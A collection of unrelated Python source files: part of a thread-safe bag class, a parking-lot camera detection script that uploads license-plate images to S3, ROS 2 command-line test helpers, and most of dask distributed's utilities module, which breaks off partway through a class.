def add(self, thing):
with self._lock:
if self._closed:
return False
if len(self._things) < self._max_size or self._max_size <= 0:
self._things.append(thing)
return True
else:
idx = random.randrange(0, len(self._things))
self._things[idx] = thing
def pop(self):
with self._lock:
if not self._things:
return None
things = self._things
self._things = []
return things
|
main.py | #-*- coding:utf-8 -*-
from detect_simple import detect
from PIL import Image
import paho.mqtt.client as mqtt
import cv2
import argparse
import time
import threading
import queue
import datetime as dt
from pprint import pprint
import json
import re
import boto3
from botocore.exceptions import ClientError
import os
# IAM ID, Key Setting
my_id = ''
my_key = ''
q = queue.Queue()
def on_connect(client, userdata, flags, rc):
if rc == 0:
print("connected OK")
else:
print("Bad connection Returned code=", rc)
def on_disconnect(client, userdata, flags, rc=0):
print(str(rc))
def on_subscribe(client, userdata, mid, granted_qos):
print("subscribed: " + str(mid) + " " + str(granted_qos))
# detect parking
def on_message(client, userdata, msg):
message = str(msg.payload.decode("utf-8")).split('-')
camera, location, In_out = message
#print(f"{camera}-{location}-{In_out}")
# B1/B2 - A1 A2 A3 - In/out
print()
print("=============================")
print(f"detect 감지 : {camera} - {location} - {In_out}")
print("=============================")
print()
info = {"parkingLotIndex" : 1, "section" : camera, "type": In_out, "createdAt": dt.datetime.now().strftime("%Y-%m-%d %H:%M:%S")}
q.put((location, info))
# 카메라 스냅샷
def detect_Snapshot(camera):
if camera == "B1":
url = 'rtsp://id:password@192.168.0.23/'
elif camera == "B2":
url = 'rtsp://id:password@192.168.0.23/' # 24로 바꾸기
cap = cv2.VideoCapture(url)
ret, image = cap.read()
if not ret:
print("Snapshot Error!")
return
# 후에 없앨 것
if camera == "B1":
cv2.imwrite('./camera/camera1.jpg', image)
img_path = './camera/camera1.jpg'
elif camera == "B2":
cv2.imwrite('./camera/camera2.jpg', image)
img_path = './camera/camera2.jpg'
return img_path
def start(location, info):
camera = info["section"]
In_out = info["type"]
jdict = dict()
#img_path = detect_Snapshot(camera)
img_path = './camera/camera1.jpg'
jdict["info"] = info
if location != "snapshot":
info["type"] = "parking"
if In_out == "In":
data = detect(img_path, location)
data = data[int(location[-1])-1]
elif In_out == "Out":
data = {"location": location, "inOut": "out"}
jdict["data"] = [data]
return jdict
data = detect(img_path, location)
jdict["data"] = data
return jdict
def subscribing():
client.on_message = on_message
client.loop_forever()
def Timesnap():
print()
print("=============================")
print("SNAPSHOT")
print("=============================")
print()
# B1 B2 둘다 넣기
info = {"parkingLotIndex" : 1, "section" : "B1", "type": "snapshot", "createdAt": dt.datetime.now().strftime("%Y-%m-%d %H:%M:%S")}
q.put(("snapshot",info))
info = {"parkingLotIndex" : 1, "section" : "B2", "type": "snapshot", "createdAt": dt.datetime.now().strftime("%Y-%m-%d %H:%M:%S")}
q.put(("snapshot",info))
threading.Timer(180, Timesnap).start()
def event_queue():
while True:
location, info = q.get()
print()
print("=============================")
print(f"detect start : {location}")
print("=============================")
jdict = start(location, info) # snapshot A1 A2 A3
saved_json_image(jdict)
print("=============================")
print(f"detect {location} end")
print("=============================")
print()
q.task_done()
s3 = boto3.client(
's3', # s3 service
aws_access_key_id=my_id, # Access ID
aws_secret_access_key=my_key) # Secret Access Key
def create_s3_bucket(bucket_name):
print("Creating a bucket... " + bucket_name)
try:
response = s3.create_bucket(
Bucket=bucket_name,
CreateBucketConfiguration={
'LocationConstraint': 'ap-northeast-2' # Seoul Region
}
)
return response
except ClientError as e:
if e.response['Error']['Code'] == 'BucketAlreadyOwnedByYou': # If already have bucket
print("Bucket already exists. skipping..")
else:
print("Unknown error, exit..")
def saved_json_image(jdict):
response = create_s3_bucket("parking-management-s3") # Bucket Name Setting
print("Bucket : " + str(response))
files = []
stored_names = []
section = jdict['info']['section'][-1]
for i in range(len(jdict['data'])):
if jdict['data'][i]['inOut'] == 'in':
loc = jdict['data'][i]['location'][-1]
files.append(f'./detections/crop/camera{section}/license_plate_{loc}.jpg')
numbers = re.sub(r'[^0-9]', '', jdict['info']['createdAt'])
img_Url = f"carImg/{numbers}_A{loc}.jpg"
json_Url = f"carData/{numbers}.json"
jdict['data'][i]['imgUrl'] = img_Url
stored_names.append(img_Url)
pprint(jdict)
for file, stored_name in zip(files, stored_names):
print(file, stored_name)
s3.upload_file(file, "parking-management-s3", stored_name)
with open("./result/data.json", "w") as f:
json.dump(jdict, f)
s3.upload_file("./result/data.json", "parking-management-s3", json_Url)
if __name__ == '__main__':
'''
client = mqtt.Client()
# 콜백 함수 설정 on_connect(브로커에 접속), on_disconnect(브로커에 접속중료), on_subscribe(topic 구독),
# on_message(발행된 메세지가 들어왔을 때)
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_subscribe = on_subscribe
# address : localhost, port: 1883 에 연결
client.connect('192.168.0.33', 1883)
# common topic 으로 메세지 발행
client.subscribe('test', 1)
sub = threading.Thread(target = subscribing)
event_queue = threading.Thread(target=event_queue, daemon=True)
sub.start()
Timesnap()
event_queue.start()
'''
info = {"parkingLotIndex" : 1, "section" : "B1", "type": "In", "createdAt": dt.datetime.now().strftime("%Y-%m-%d %H:%M:%S")}
jdict = start("A1",info)
saved_json_image(jdict) |
utils.py | # Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import os
import random
import subprocess
import sys
import tempfile
import threading
import rclpy
def require_environment_variable(name):
"""Get environment variable or raise if it does not exist."""
env = os.getenv(name)
if env is None:
raise EnvironmentError('Missing environment variable "%s"' % name)
return env
class HelperCommand:
"""Execute a command in the background."""
def __init__(self, command):
self._env = dict(os.environ)
self._command = copy.deepcopy(command)
# Execute python files using same python used to start this test
if command[0][-3:] == '.py':
self._command = list(self._command)
self._command.insert(0, sys.executable)
self._env['PYTHONUNBUFFERED'] = '1'
def __enter__(self):
self._proc = subprocess.Popen(self._command, env=self._env)
return self
def __exit__(self, t, v, tb):
self._proc.kill()
class TemporaryFileWithContent:
"""Create a named temporary file with content."""
def __init__(self, content):
self._tempdir = tempfile.TemporaryDirectory(prefix='test_cli_')
self._content = content
def __enter__(self):
directory = self._tempdir.__enter__()
name = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(10))
self._filename = os.path.join(directory, name)
self._file = open(self._filename, mode='w')
self._file.write(self._content)
self._file.flush()
# close so it can be opened again on windows
self._file.close()
return self._file.name
def __exit__(self, t, v, tb):
self._tempdir.__exit__(t, v, tb)
class BackgroundExecutor:
"""Spin an executor in the background."""
def __init__(self, node, time_between_spins=0.25):
self._node = node
self._time_between_spins = time_between_spins
def __enter__(self):
self._stop = threading.Event()
self._thr = threading.Thread(target=self._run, daemon=True)
self._thr.start()
def _run(self):
while not self._stop.is_set():
rclpy.spin_once(self._node, timeout_sec=self._time_between_spins)
def __exit__(self, t, v, tb):
self._stop.set()
self._thr.join()
|
utils.py | import asyncio
import functools
import html
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import shutil
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
# Import config serialization functions here for backward compatibility
from dask.config import deserialize as deserialize_for_cli # noqa
from dask.config import serialize as serialize_for_cli # noqa
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa: F401
format_bytes,
format_time,
funcname,
parse_bytes,
parse_timedelta,
)
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
# FIXME: this breaks if changed to async def...
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
"""Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with suppress(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = parse_timedelta(callback_timeout, "s")
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
# We flag the thread state asynchronous, which will make sync() call
# within `func` use async semantic. In order to support concurrent
# calls to sync(), `asynchronous` is used as a ref counter.
thread_state.asynchronous = getattr(thread_state, "asynchronous", 0)
thread_state.asynchronous += 1
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
assert thread_state.asynchronous > 0
thread_state.asynchronous -= 1
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return key_split(x)
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
try:
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
The object to be converted. Will correctly handled
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def is_writeable(frame):
"""
Check whether frame is writeable
Will return ``True`` if writeable, ``False`` if readonly, and
``None`` if undetermined.
"""
try:
return not memoryview(frame).readonly
except TypeError:
return None
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def deprecated(*, version_removed: str = None):
"""Decorator to mark a function as deprecated
Parameters
----------
version_removed : str, optional
If specified, include the version in which the deprecated function
will be removed. Defaults to "a future release".
"""
def decorator(func):
nonlocal version_removed
msg = f"{funcname(func)} is deprecated and will be removed in"
if version_removed is not None:
msg += f" version {version_removed}"
else:
msg += " a future release"
@functools.wraps(func)
def wrapper(*args, **kwargs):
warnings.warn(msg, DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
return wrapper
return decorator
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
asyncio.get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
# TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below,
# once tornado > 6.0.3 is available.
if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"):
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
# https://github.com/tornadoweb/tornado/issues/2608
BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy
else:
BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy
class AnyThreadEventLoopPolicy(BaseEventLoopPolicy):
def get_event_loop(self):
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
loop = self.new_event_loop()
